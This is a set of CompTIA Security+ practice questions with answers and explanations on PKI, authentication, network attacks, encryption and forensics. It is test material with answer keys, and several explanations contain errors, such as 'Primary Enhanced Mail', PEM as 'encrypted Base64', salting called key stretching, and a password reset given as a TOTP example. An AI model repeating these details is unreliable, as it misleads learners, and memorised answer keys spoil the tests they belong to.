A NOP slide is an indication of what kind of attack?

Buffer overflow NOP slide is a technique used to exploit a buffer overflow. This is done by corrupting the stack with no-op machine instructions. A NOP slide is sometimes referred to as an NOP sled or NO-OP sled. SQL injections exploit databases. XSS (cross-site scripting) attacks exploit web servers and web pages. Smurf attacks are DoS attacks.

What are recovery point objectives and recovery time objectives related to?

Business impact analysis Business impact analysis is the examination of critical versus noncritical functions. These functions are assigned two different values: recovery point objective (RPO), which is the acceptable latency of data, and recovery time objective (RTO), which is the acceptable amount of time to restore a function. Risk management is the identification, assessment, and prioritization of risks. Succession planning is a method for replacing servers and other equipment when they become outdated or if they fail permanently. A single point of failure is any hardware on a server or other device that will cause the device to shut down or otherwise stop serving users.

3-leg perimeter

C178 Network and Security - Applications CompTIA Security+ Course and Labs HB 3-leg perimeter Back: click to flip A type of DMZ where a firewall has three legs that connect to the LAN, the Internet, and the DMZ. Grade This Item Grade This Item Correct Alt C and Incorrect Alt I 9 of 15 Go Back

You are working on a new security system for a U.S. military installation that is only accessed by military personnel. Which certificate-based authentication system should you integrate?

CAC A Common Access Card (CAC) is a certificate-based smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.None of the other options are implemented by the U.S. military.Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is with range of the proximity card, and the information transmitted is correct, authentication is granted. A Personal Identity Verification (PIV) card is a certificate-based smart card issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user.

Which of the following is a type of photo ID that is used by government officials to gain access to secure locations?

CAC CAC (Common Access Card) is a smart card used by the Department of Defense (DoD) to identify military personnel, government employees, and so on. Biometrics is the science of using a human's physical characteristics for identification. DAC is the discretionary access control method. RSA tokens allow for rolling one-time passwords.

Your company has a mix of on-premises infrastructure and cloud-provider infrastructure and needs to extend the reach of its security policies beyond the internal infrastructure. Which of the following would be the BEST solution for the company to consider?

CASB If there is a mix of on-premises infrastructure and cloud-provider infrastructure, a company might consider a cloud access security broker (CASB). A CASB is a software tool or service that acts as the gatekeeper between the two, allowing the company to extend the reach of its security policies beyond its internal infrastructure. Software as a service (SaaS) is when users access applications over the Internet that are provided by a third party. The applications need not be installed on the local computer. Platform as a service (PaaS) is a service that provides various software solutions to organizations, especially the ability to develop applications in a virtual environment without the cost or administration of a physical platform. PaaS is used for easy-to-configure operating systems and on-demand computing. Monitoring as a service (MaaS) is a framework that facilitates the deployment of monitoring within the cloud in a continuous fashion.

You are evaluating several biometric authentication systems. Which is the best metric to use to quantify the effectiveness of the subject system?

CER Crossover error rate (CER) is the point where FAR and false FRR are equal. Generally, a lower CER value would indicate a more accurate system. CER is primarily used to compare biometric authentication systems. False acceptance rate (FAR) is one way to measure the accuracy of a biometric authentication system. It measures how likely it would be that an unauthorized user is granted access to the system. Expressed as a ratio, it is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. A false acceptance can occur, for example, when an unauthorized individual with a dirty finger uses a fingerprint reader, and is allowed access to the system. This could happen because the system was not precise enough when matching the authorized user. By contrast, false rejection rate (FRR) measures how likely it would be that an authorized user is denied access to the system. It is also expressed as a ratio, calculated as the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures.HOTP and TOTP are two types of one-time passwords, i.e., they can only be used once. Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once used, or once the time expires, the TOTP is no longer valid. As an example of a TOTP, a user forgets a password to a website. When the user clicks the "Forgot Password" link, the website would send a new temporary password to the user, but would limit how long the temporary password would be valid. Other considerations include ABAC, proximity cards, smartcards, tokens, CAC, PIV, and file security.Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. ABAC would also be invoked if a user has read access to files, but is attempting to edit or delete files remotely. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is with range of the proximity card, and the information transmitted is correct, authentication is granted. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. A common access card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.A personal identity verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login.File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

You suspect that several users are using expired digital certificates and that other digital certificates are very close to expiration. You need to examine the list of serial numbers of digital certificates that have not expired, but should be considered invalid. Which PKI component should you examine?

CRL A certificate revocation list (CRL) contains a list of serial numbers for digital certificates that have not expired, but that a certification authority (CA) has specified to be invalid. Typically, the serial number of a digital certificate is placed in a CRL because the digital certificate has been compromised in some way. Answers A, D, and C are incorrect. A CA generates and validates digital certificates. The CA verifies the authenticity of the certificate elements. A Key Distribution Center (KDC) is used in Kerberos network authentication to distribute resource access keys. User Datagram Protocol (UDP) provides connectionless communications on TCP/IP networks.

Where would you store a revoked certificate?

CRL The CRL (certificate revocation list) is where revoked certificates should be stored. Key escrow is when certificate keys are held in the case that third parties need to access information. The recovery agent recovers lost keys. PKI stands for public-key infrastructure and is the entire system of parts that allows for certificates, certificate authorities, and so on.

Which of the following might be included in Microsoft Security Bulletins?

CVE Common Vulnerabilities and Exposures (CVE) can be included in Microsoft Security Bulletins and will be listed for other web server products such as Apache. PHP and CGI are pseudo-programming languages used within HTML for websites. Both can contain harmful scripts if used inappropriately. Transport Layer Security (TLS) is a protocol used by sites secured by HTTPS.

Click to select the items in the list, and then drag them in the correct order in which the forensic analyst should preserve them.

Cache RAM Running processes Hard drives Backup media

You are building a public-access WiFi system for a new hotel. You want to require the users to accept a fair use policy before connecting to the Internet. Which of the following should you implement?

Captive portal Captive portals are associated with public-access WiFi networks. Once you select the network, you are directed to a web page. There, you typically have to sign on and agree to a policy such as an acceptable use or fair use policy. Once your agreement is accepted, you can use the network. These portals are typically found in a public place, such as a hotel, coffee shop, or airport. None of the other options would force users to accept a fair use policy before connecting to the Internet.Answer D is incorrect. WiFi Protected Setup (WPS) allows a wireless access point to broadcast a PIN, which connecting devices use for authentication. It is not a difficult task to break the PIN using a packet sniffer. Answer C is incorrect. IEEE 802.1x is standard for network access control. It allows you to apply security to an individual port on a switch with the result of only allowing authenticated users access to that port.Answer B is incorrect. RADIUS Federation is a group of RADIUS servers that assist with network roaming and will validate the login credentials of a user belonging to another RADIUS server's network. For the Security+ exam, you also need to understand EAP-FAST, EAP-TLS, and EAP-TTLS.Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) is used in wireless and point-to-point networks. EAP manages key transmissions, and FAST creates a TLS tunnel to be used in authentication through a protected access credential.In Extensible Authentication Protocol-Transport Layer Security (EAP-TLS), EAP manages key transmissions, and TLS uses X.509 digital certificates for authentication. In Extensible Authentication Protocol-Tunneled Transport Layer Security (EAP-TTLS), EAP manages key transmissions, and TTLS is an extension of TLS (which authenticates the server). TTLS encapsulates the TLS session, allowing for authentication of the client.

The IT director asks you to protect a server's data from unauthorized access and disclosure. What is this an example of?

Confidentiality Confidentiality means preventing the access and disclosure of information to unauthorized persons. Integrity means that authorization is necessary before data can be modified by a user. Availability means that data is obtainable regardless of how information is stored, accessed, or protected. Non-repudiation is a concept of ensuring that people cannot refute claims against them; it is accomplished with computer evidence such as log files.

You have set a password policy that requires default passwords to be changed upon system installation. However, you suspect that some default passwords have not been changed. Which software tool would you use to locate the password violations?

Configuration compliance scanner A configuration compliance scanner will look for vulnerabilities that fail to comply with configuration requirements. Such failures include default passwords that have not been changed, patches that have not been applied to network hardware, and firewalls that are not configured properly.Answers C, D, E, and A are incorrect. Vulnerability scanner is the general term for tools that help you locate weaknesses in your network before they are exploited by an attacker. Vulnerability scanners include steganography tools and data sanitization tools. Exploitation frameworks are tools used by a network administrator to test the security of a network, such as a penetration test. One of the best known exploitation framework tools is Metasploit. Data sanitization tools are used to ensure that information is completely removed from a device before it is discarded, sold, or recycled. A plethora of tools are available that assist with recovering deleted files. Steganography tools detect data or files that are hidden within other files. For example, Invisible Secrets hides data in sound or image files, and Deep Sound will also hide data in sound files.

Your network is a Windows domain controlled by a Windows Server domain controller. Your goal is to configure user access to file folders shared to the network. In your organization, directory access is dependent upon a user's role in the organization. You need to keep to a minimum the administrative overhead needed to manage access security. You need to be able to quickly modify a user's permissions if that user is assigned to a different role. A user can be assigned to more than one role within the organization. What solutions should you implement? (Select the two best answers.)

Create an OU for each organizational role and link GPOs to each OU Create security groups and assign access permissions based on organizational roles The first thing you should do as a network administrator is create organizational units (OUs) for each of the departments in your organization; this helps to categorize and classify where users will ultimately end up. Each OU will be considered a different role. Next on the list is creating Group Policy objects (GPOs), modifying the security policies, and applying those to each individual OU. Then, you should create the users and place them in their correct OUs according to the department that they will be working in and the role that they will play. Finally, you should create security groups, add users to the appropriate security group or groups, and apply access permissions to the groups, instead of the users, to save time and keep administrative overhead to a minimum. Placing the user's computer in an OU could cause issues when it comes time to move a user account to another OU; the computer account would need to be moved with it. Access permissions should not be assigned solely by the individual user account; this would increase administrative overhead by a great deal.

Which of the following web application security weaknesses can be mitigated by preventing the usage of HTML tags?

Cross-site scripting Cross-site scripting (XSS) is an attack on website applications that injects client-side script into web pages. SQL injection is a type of code injection that exploits vulnerabilities in databases. LDAP injection can be used to modify LDAP statements and modify the LDAP tree. Rootkits are software designed to gain administrator-level access over a computer system.

You are comparing cryptographic solutions to implement at your organization. Which two items should you focus on when you are evaluating implementation versus algorithm selection?

Crypto service providers Crypto modules You should focus on crypto service providers and crypto modules when you are evaluating implementation versus algorithm selection. Crypto service providers should be able to answer questions regarding which algorithm(s) they use to generate keys and how they store keys. Crypto service providers are parties that provide cryptographic services. An example is Active Directory Certificate Services from Microsoft.You should select crypto modules to match the type of data to be protected and the equipment on which the module will be deployed. For example, a module for a mobile device should not consume a substantial amount of processing power or battery life. An example is Microsoft Kernel Mode Cryptographic Module. None of the other options are factors that would affect the decision when evaluating a cryptographic solution based on implementation versus algorithm selection.Answer E is incorrect. Key stretching takes a weak key and makes it stronger by adding additional characters. Often, a password is hashed, and a salt is used to make the password stronger. Salting is a form of key stretching.Answer A is incorrect. Security through obscurity is the false confidence that the secret design or implementation is going to be sufficient to provide system safeguards. Often, the system is not all that secure, and the hope is that because no one knows about it, you are therefore protected. Key strength should reflect the sensitivity of the data it protects. Generally, as the need to secure the data increases, so should the strength of the key. Longer keys require more processing power (and time) to break.

Your web server that conducts online transactions crashed, so you examine the HTTP logs and see that a search string was executed by a single user masquerading as a customer. The crash happened immediately afterward. What type of network attack occurred?

DOS A denial-of-service (DoS) attack probably occurred. The attacker most likely used code to cause an infinite loop or repeating search, which caused the server to crash. It couldn't have been a DDoS (distributed denial-of-service) because only one attacker was involved. MAC spoofing is when an attacker disguises the MAC address of his network adapter with another number. MITM stands for the man-in-the-middle attack, which wasn't necessary since the attacker had direct access to the search fields on the web server. A DNS amplification attack is when an attacker spoofs DNS requests to flood a target website.

One of your servers (10.254.254.201) is only allowing slow and intermittent connections to clients on the network. You check the logs of the server and see a large number of connections from the following IP addresses: 10.254.254.38 10.254.254.79 10.254.254.102 11.57.86.86 198.155.201.214 212.119.64.32 The connections from these six hosts are overloading the server and causing it to stop responding to requests from clients. What type of attack is happening?

DDoS A DDoS (distributed denial of service) attack is occurring. Most likely there is a botnet with computers on the Internet (such as 212.119.64.32) and computers on the LAN (such as 10.254.254.102) that are all zombies—and part of the botnet—concentrating an attack on the server at 10.254.254.201. It is known as a distributed attack because the entire attack is broken up among multiple computers. These attacks often happen on a large scale, where thousands of computers simultaneously attack a well-known server. The Xmas tree attack is one where special packets are sent that have specific flags set. It can ultimately act as a denial of service (DoS) attack if launched correctly. But it is not used for distributed DoS attacks. XSS stands for cross-site scripting, a type of code injection attack that exploits a computer programming flaw, often in web server forms. As mentioned, DoS stands for denial of service, an attack often performed by a single computer, not six or thousands in the way that a DDoS attack would occur.

The client's specifications dictate that you use a Base64 ASCII-encoded certificate. Which of the following certificate types would NOT be acceptable?

DER You should not use a DER certificate, because the Distinguished Encoding Rules (DER) certificate is encoded by ASN.1 in X.690, not Base64. DER encoded files do not support storage of the private key or certification path. By default, Windows servers export certificate files as DER encoded files. DER is the "parent" format of PEM. All of the other types are Base64 ASCII-encoded certificates.Answers B, A, and D are incorrect. A P7B file is a certificate file format that uses Base64 ASCII encoding. It is generally used by the CA to provide certificate chains to clients. P12 is a variant of PFX.A PFX certificate file is used by Microsoft and contains both the public and private keys. The container is fully encrypted. You should use OpenSSL to convert this into a PEM encoded file. PFX and P12 are the most common file types for exporting the private key. Primary Enhanced Mail (PEM) certificates are primarily used for web servers, and can be read in a text editor. The PEM encoded file format contains the certificate encoded in encrypted Base64. It is used in Unix/Linux environments. DER certificates can be converted to PEM encoded files through SSL. A Canonical Encoding Rules (CER) certificate contains the certificate encoded in encrypted Base64. Like DER encoded files, CER does not support storage of the private key or certification path. Most certificates are in one of two formats: Base64-encoded or DER-encoded binary. Some Web server applications may require the certificate to be in DER-encoded binary format.

Which of the following are symmetric encryption algorithms?

DES AES 3DES RC4 AES, DES, RC4, and 3DES are all symmetric encryption algorithms.ECC, RSA, and Diffie-Hellman are asymmetric encryption algorithms.

Your company deploys several LDAP servers, which is used to allow users to locate resources. What contains LDAP entries?

DIT Lightweight Directory Access Protocol (LDAP) entries are contained in a directory information tree (DIT), which is a hierarchical structure that can be searched for directory information. The start of the LDAP tree is called the root. LDAP is a directory service that enables users to find resources on a network, and it operates on well-known port 389. LDAP with SSL uses port 636. The purpose of LDAP authentication services is to provide a single point of user management.Answers B, A, and D are incorrect. LDAP Data Interchange Format (LDIF) enables LDAP servers to exchange directory information. LDAP can use Transport Layer Security (TLS) to secure LDAP transmissions. LDAP over TLS operates on well-known port 636. X.500 is a directory service specification on which LDAP is based.By default, LDAP communications between client and server applications are not encrypted, meaning that it would be possible to use a network monitoring device to view the communications traveling between LDAP computers. LDAP over Secure Sockets Layer (SSL) / Transport Layer Security (TLS), also known as LDAPS or Secure LDAP, will encrypt communications.

Your organization is attempting to reduce risk concerning the use of unapproved USB devices to copy files. What could you implement as a security control to help reduce risk?

DLP DLP (data loss prevention) methods are often implemented in scenarios where USB mass storage devices are utilized (such as USB flash drives and external hard drives). A storage-based DLP system monitors data at rest, and performs content inspection in order to prevent unauthorized use of the data. An IDS (intrusion detection system) is used to detect attacks and anomalies on the network. Content filtering is performed by proxy servers and Internet content filters—usually relating to Internet content. Auditing is when files and other resources are investigated in real time to see who accessed what and when.

Drag the network technology to its description.

DMZ: A network that is isolated from other networks using a firewall VLAN: A network that is isolated from other networks by packet tagging NAT: A transparent firewall solution between networks that allows multiple internal computers to share a single Internet interface and IP address NAC: A network server that ensures that all network devices comply with an organization's security policy

Which algorithm is used as the digital signature for the US government, and was developed by NIST and the NSA?

DSA Digital Signature Algorithm (DSA) is the digital signature standard for the US government. It was published by the National Institute of Standards and Technology (NIST) and the National Security Agency (NSA).Answer D is incorrect. Galois Counter Mode (GCM) uses a special binary field (called a Galois field) to provide authenticated encryption.Answer A is incorrect. Electronic Codebook Module (ECB) is a cipher mode where each block is independent of the next. With ECB, the symmetric algorithm is used without modification. Answer B is incorrect. Counter (CTR) Mode converts a block cipher (blocks of data) into a stream cipher (one bit at a time). It utilizes synchronous counters at the sender and the receiver.Another algorithm you need to understand for the Security+ exam is Diffie-Hellman. There are several groups (levels) of algorithms within Diffie-Hellman, with differing key lengths and methodologies. Diffie-Hellman groups 1, 2, and 5 are based on 768-bit, 1024-bit, and 1536-bit modules, respectively, and their implementation should be avoided. The minimum acceptable group within Diffie Hellman is group 14, which employs a 2048-bit module. Group 19 provides the next highest level of encryption with a 256-bit elliptical curve. Next Generation Encryption is achieved through implementation of groups 20 and 21, which use 384-bit and 521-bit elliptical curves, respectively.

Your company implements several databases. You are concerned with the security of the data in the databases. Which statement is correct for database security?

Data control language (DCL) implements security through access control and granular restrictions. Data control language (DCL) implements security through access control and granular restrictions. Answers B, A, and D are incorrect. Data identification language is not a valid database component.Data manipulation language (DML) is used to insert, retrieve and modify the data contained within a database.Bind parameters are an alternative way to pass data to the database. Instead of putting the values directly into a SQL statement, you use a placeholder. They do not implement granular restrictions.

Which statement best describes data normalization?

Data normalization ensures that attributes in a database table depend on the primary key. Data normalization ensures that attributes in a database table depend only on the primary key. Normalization is required to prevent repetitive information from appearing in a database. This makes the database consistent and easy to maintain. Normalization is the process of eliminating redundant data from a relational database management system and storing the data at a single location. Normalization provides links to the data components whenever needed.The issues involved in normalization of a database are as follows: Segregating related groups into separate tables. Deleting redundant data from all the tables in a database. Ensuring that there is only one primary key per table and that all the attributes can be referred by using this primary key. The process of normalization should be carried out carefully because dividing the data into multiple tables can break the consistency in retrieving information from the database and result in performance degradation. Database denormalization is the process of adding the redundant information to the tables to optimize the consistency and the performance of the database. Data denormalization is diametrically opposite to the data normalization process. The purpose of data denormalization is to increase the processing efficiency.Polyinstantiation is a method used to ensure that users with lower access level are not able to access and modify data categorized for a higher level of access in a multi-level database. When polyinstantiation is implemented, two objects are created by using the same primary keys. One object is filled with incorrect information and is deemed unclassified, and the other object contains the original classified information. When a user with lower level privileges attempts to access the object, the user is directed to the object containing incorrect information. Polyinstantiation is used to conceal classified information that exists in a database and to fool intruders.

What is a default rule found in a firewall's ACL?

Deny All The deny all rule is a default rule found in a corporate firewall's access control lists (ACLs). It is an example of the implicit deny concept. Permit all is not a default rule, as that would be quite dangerous. Netsh advfirewall firewall is a command used in Windows to view personal firewall information. Add address=192.168.0.0/16 is a way to disable (or enable) private addressing space.

Which of the following methods will identify which network services are running on a computer?

Determine open ports By using a port scanner (and some vulnerability scanners), you can identify which ports are open on a computer (or other device), which in turn will tell you the corresponding services that are running on that computer. For example, if you see that port 80 is open, then you know that the HTTP service is running, and most likely that the computer is also acting as a web server.All other answers are incorrect because they are unrelated to identifying services running on a computer.

Management has recently expressed concern over port security. You have been asked to ensure that all network ports are as secure as possible. Which of the following methods of port security should you implement? (Choose all that apply.)

Ensure that TCP and UDP ports are managed properly. Ensure that wiring closets are locked. Ensure that the MAC addresses of connected devices are monitored. Port security is implemented on switches to ensure unauthorized devices cannot connect to the network through that port. Valid methods of port security include the following: Ensure wiring closets are locked - This ensures that rogue devices cannot be plugged into your network. Ensure that TCP and UDP ports are managed properly - This ensures that hackers cannot access your network via open TCP or UDP ports. Ensure that the MAC addresses of connected devices are monitored - This ensures that devices that connect to the network are identified. Media access control (MAC) addresses are used to uniquely identify network devices, including computers. Port knocking does provide some level of port security. The option regarding port knocking is incorrect because it states that you should NOT implement port knocking.

As a security administrator, you must be constantly vigilant and always be aware of the security posture of your systems. Which of the following supports this goal?

Establishing baseline reporting The key words of the question are "security posture." One of the best methods of monitoring the security posture of your systems is establishing baseline reporting. Baselining is the process of measuring changes in networking, hardware, software, and so on. Creating a baseline consists of selecting something to measure and measuring it consistently for a period of time. It is this baselining (and automated reporting with baselining tools such as Performance Monitor or Wireshark) that allows you to be vigilant and watch over your network carefully in real time. Disabling unnecessary services is an important security concept, but this refers to hardening the system, and reducing the attack surface. Training staff on security policies is educating the user and is extremely important when attempting to reduce the consequences of successful social engineering attacks. Installing anti-malware applications also hardens the system, and secures it in general against viruses, worms, Trojans, and other forms of malware.

What is the BEST method to avoid buffer overflows?

Execute a well-written program. A well-written program is the best method to prevent buffer overflow errors. Buffer overflow occurs when the length of the input data is longer than the length processor buffers can handle. Buffer overflow is caused when input data is not verified for appropriate length at the time of input. Buffer overflow and boundary condition errors are examples of input validation errors.Answer C is incorrect. Audit trails and file integrity checks are examples of security controls in a trusted application system. Security controls cannot control buffer overflow, but can assist in monitoring unauthorized activity on either an application or a system.Answer D is incorrect. A check digit, also referred to as a checksum, provides data integrity by computing hash values. A checksum occurs when either a source application or a system uses a mathematical formula to compute a hash value against a standard input and sends the value to the destination. After receiving the data, the receiving application performs the same mathematical operation. If the hash values match, the data is considered acceptable. If the hash values do not match, the data is discarded. Check digits do not either prevent or detect buffer overflows.Answer A is incorrect. A reasonableness check verifies whether the data within an application program lies within the predefined limits and format. For example, an application meant for processing numbers should not accept alphabetical characters as a valid input. Reasonableness checks monitor the data input format and not the buffer overflows.

You are explaining to a new employee the proper process of evidence collection. As part of this explanation, you need to ensure that the new employee understands the evidence life cycle. Click to select the steps of the evidence life cycle, and then drag them into the correct order.

Explanation: Here are the steps of the evidence life cycle: Collect Analyze Store Present Return

You are designing security for a new e-commerce web site. You know that you will use HTTPS as the browser protocol. The legal team has asked you to validate using the name of the responsible legal entity in the certificate, to supply other validation parameters, and to provide a higher level of trust than domain validation. Which certificate would you use?

Extended validation certificate Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates require the most effort by the CA to validate and provide a higher level of trust than domain validation because they are validated using more than the domain information.Answer B is incorrect. Machine/computer certificates are assigned to a designated machine. During authentication, the computer (or machine) requesting access must supply the certificate assigned to it. Answer A is incorrect. Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy. They are self-signed and are closely guarded.You should also be familiar with wildcard certificates, SAN fields, code signing certificates, user certificates, self-signed certificates, root certificates, and domain validation certificates.Wildcard certificates allow you to create a certificate in a domain, and use that same certificate for multiple subdomains. For example, if you had mail.mysite.com, ftp.mysite.com, and www.mysite.com, you could issue a wildcard certificate for mysite.com, and have it cover all the subdomains. Without the wildcard certificate, you would have to issue a certificate for each subdomain. Subject Alternative Name (SAN) is a field in the certificate definition that allows you to stipulate additional information, such as an IP address or host name, associated with the certificate. Code signing certificates are used for code that is distributed over the Internet, including programs or applications. Code signing certificates verify the code's origin and help the user trust that the claimed sender is indeed the originator.Self-signed certificates are digitally signed by the user. This is often provided by Microsoft Internet Information Services (IIS). The self-signed certificate will transmit a public key, but that key will be rejected by browsers. User certificates are assigned to individual users, much like machine/computer certificates are assigned to individual machines. Users must provide their assigned certificate for authentication prior to accessing certain resources. Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy. They are self-signed and are closely guarded.Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name.

Which of the following descriptions is true concerning external security testing?

External security testing is conducted from outside the organization's security perimeter. Proper external security testing should be conducted from outside the organization's security perimeter, wherever that might be. It is generally outside of devices such as switches, routers, firewalls, and so on.

To achieve multifactor security, what should you implement to accompany password usage and smart cards?

Fingerprint readers The best answer is to use a biometric solution such as fingerprint readers. This is a different factor of authentication, and works well with smart cards and passwords. Biometric authentication falls into the factor category of something you are. The rest of the answers are within the categories of factors already mentioned in the question. Badge readers would be used with smart cards (or proximity cards) as would hard tokens; they are within the category of something you have. Passphrases are essentially the same as passwords; they are within the category of something you know.

Which of the following devices would most likely have a DMZ interface?

Firewall The firewall is the device most likely to have a separate DMZ interface. Switches connect computers on the LAN. VoIP phones are used by individuals to make and answer phone calls on a Voice over IP connection. A proxy server acts as a go-between for the clients on the LAN and the web servers that they connect to, and caches web content for faster access.

You suspect that files are being illegitimately copied to an external location. The file server that the files are stored on does not have logging enabled. Which log should you access to find out more about the files that are being copied illegitimately?

Firewall log The firewall log can help you find out whether files are being illegitimately copied to an external location. This is the only log listed that can give you any information about files being copied to an external or remote location. The DNS log can help you find out whether unauthorized zone transfers or DNS poisoning has occurred. The antivirus log shows what viruses have been detected and quarantined on a system. The System log is a log file within the Event Viewer that provides information about the operating system and device drivers.

Jennifer has been tasked with configuring multiple computers on the WLAN to use RDP on the same wireless router. Which of the following might be necessary to implement?

Forward each computer to a different RDP port. If there are multiple computers allowing incoming Remote Desktop Protocol (RDP) sessions on the WLAN, you might have to configure the wireless router to forward each computer to a different RDP port. For example, the standard RDP port is 3389 (also known as Terminal Services). If that is open on the router, then clients on the Internet will be able to initiate RDP sessions to your network. But usually, the port on the router can only be forwarded to one computer. It might be necessary to set up additional port numbers and have each one map to a separate computer on the WLAN. Of course, the users on the Internet would need to know the special port number that corresponds to the computer they want to connect to. Often this will be used for remote access by the employee who would otherwise be working at the computer in the office. You would not normally create a DMZ for each computer, and this would make it difficult to configure so that the computers could communicate with each other. Turning off port forwarding would make the situation worse and would stop any remote connections from flowing through the router. AP isolation would also separate the wireless clients and would not have an effect on the goal at hand.

In the event that a mobile device is stolen, what two security controls can prevent data loss? (Select the two best answers.)

Full device encryption Screen locks Screen locks (especially the password and passcode variety) can make it difficult for an attacker to get to the data stored on the device. Better yet, full device encryption will make it virtually impossible to read the data. These are the best options, but not the only options. For example, a security administrator might opt to install a remote wipe program. Once it is known the mobile device has been stolen, the admin can trigger the wipe from a central location. However, there is a time delay concerning this method, so it should be used with the previous techniques. From a security standpoint, a global positioning system (GPS) is usually more of a hindrance than a security control. It might help in recovering the device, but by that point the damage has probably already been done. Inventory control and the tracking of assets are important (and are sometimes done with the aid of GPS), but remember that an unprotected mobile device can have its data downloaded by an attacker in a matter of minutes. So these things are great from a management standpoint, but not from a security standpoint.

You have been tasked with sending a decommissioned SSL certificate server's hard drives to be destroyed by a third-party company. What should you implement before sending the drives out? (Select the two best answers.)

Full disk encryption Disk wiping You don't want anyone else to get a hold of your SSL certificates, even if they are expired. The best solution in the scenario is to either destroy the drives yourself or store them in a secure location for a period of time. However, if you are sending them to a third party for destruction, the best option would be to fully wipe the drives; sanitize them with powerful software, and strong methods such as the Gutmann method. Barring that, you would want to consider full disk encryption (FDE) that utilizes AES or another powerful cipher. This way, the third party, and anyone else between you and the third party, will not be able to learn the RSA keys that the certificates are based on. A data retention policy states how long data must be stored by an organization. If the drives are going to another company, then this policy is moot in this case. The server's hard drives that are referred to in the question are most likely internal drives, so removable media encryption (for things such as USB flash drives) has no bearing here. Disk hashing is not necessary. You are not interested in the data anymore, so there is no reason to hash it.

A co-worker's laptop has been compromised. What is the best way to mitigate data loss?

Full disk encryption Full disk encryption is the best way (listed) to mitigate data loss in the case of a stolen or otherwise compromised laptop because it will be difficult to decrypt the data on the laptop. A Common Access Card is a smart card/photo ID used by the DoD. Strong passwords are a good idea on portable devices but can be cracked or circumvented more easily than a full disk encryption solution. Biometric authentication can also be cracked given enough time.

You have been hired as a security consultant for a large corporation. During a meeting with the IT department, the IT manager indicates that one of their applications uses a private key encryption standard that was developed in Russia and uses 256-bit encryption keys. Which encryption standard does the application use?

GOST GOST is a Russian private key encryption standard that uses a 256-bit encryption key. GOST was developed as a counter to the Data Encryption Standard (DES). CAST-128 is a private key encryption standard that is used in Pretty Good Privacy (PGP). International Data Encryption Algorithm (IDEA) is a private key encryption standard that was developed in Switzerland. IDEA is used in PGP, and uses 128-bit encryption keys. RC5 is a private key encryption standard that was developed at the Massachusetts Institute of Technology. RC5 supports variable length encryption keys.

Your high-tech server room needs a quality fire suppression system. What is the most appropriate type of fire suppression system to install?

Gaseous fire suppression A gaseous fire suppression system is the best way to go in this scenario. Server room equipment can be easily damaged by other types of systems. An example of a gaseous fire suppression system would be FM-200. A less powerful example would be a CO2 fire extinguisher. Some municipalities require that a sprinkler system be installed, even if a gaseous fire suppression system has already been installed to the server room. If this is the case, a dry pipe sprinkler system will be installed in addition to the gaseous fire suppression system. Multipurpose dry chemical fire extinguishers can be extremely messy and can damage server room equipment easily and therefore should not be used. Wet chemical suppression is even worse. These and water-based fire extinguishers should not be used in server rooms.

A security administrator is required to submit a new CSR to a CA. What is the first step?

Generate a new private key based on RSA When a person is required to submit a CSR (certificate signing request) to a CA (certificate authority), the first step—before generating the CSR—is to create a private key. This will be an asymmetric key such as RSA, commonly a 2048-bit key. (In fact, since the end of 2013 it is mandated that the key be 2048-bit or larger.) The next steps are to generate the CSR, submit the CSR for signing (the crucial part of the process), and finally install the signed certificate. It is important to keep the original RSA private key safe and secure. No one, including the CA, should know the RSA key. The CA should only know the CSR generated, which is based on the private RSA key.Symmetric keys such as AES are not used for this process; asymmetric keys such as RSA are the standard. The security administrator must use and keep safe a private key that only he or she knows. Later, when people connect to the organization's website or network, they will make use of the public key portion.

Which of the following is a removable device that can be used to encrypt in a high-availability, clustered environment?

HSM An HSM (hardware security module) is a device used to manage digital keys and provide authentication. It can be connected to a computer, a server, or a particular server in a clustered environment. Biometrics is the science of authenticating individuals by their physical traits. A cloud computer is a computer that resides on the Internet and is run by a third-party service provider that offers various computing services to individual users and small to midsized companies. A TPM is a trusted platform module that is similar to an HSM but is internal to the computer, perhaps as a chip on the motherboard.

Which device is used to encrypt the authentication process?

HSM An HSM (hardware security module) is a physical device that acts as a secure cryptoprocessor. It is used for the digital signing of data and login/authentication processes. WPA (Wi-Fi Protected Access) is a wireless protocol. An Enigma machine is a machine that was used in World War II for the encryption/decryption of secret messages. Smart cards are used to authenticate individuals, but an HSM offers faster software encryption.

